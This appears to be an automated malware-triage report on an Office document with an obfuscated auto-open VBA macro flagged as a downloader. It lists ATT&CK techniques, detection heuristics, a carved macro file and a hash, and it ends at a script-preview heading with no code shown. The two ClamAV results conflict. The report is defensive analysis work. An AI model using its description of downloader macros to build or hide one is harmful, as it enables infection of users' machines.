Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing a VBA macro. The macro is flagged as auto-executing and uses CreateObject, indicating it's designed to perform actions beyond typical document content. The presence of a 'macros.bas' file and the ClamAV detection strongly suggest it's a downloader for a second-stage payload. The obfuscated nature of the VBA code, as indicated by the 'Deobfuscate or Obfuscate Malicious Code' heuristic, further supports this.
Heuristics: 8
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call present.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37544 bytes |

SHA-256: c2e9966c5e9bf2a7e5de8ea62e438c237bd410d4af4cf7d5a8fc410e9534bf48

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 12 long base64-like blobs)
Preview script: first 1,000 lines of the extracted script.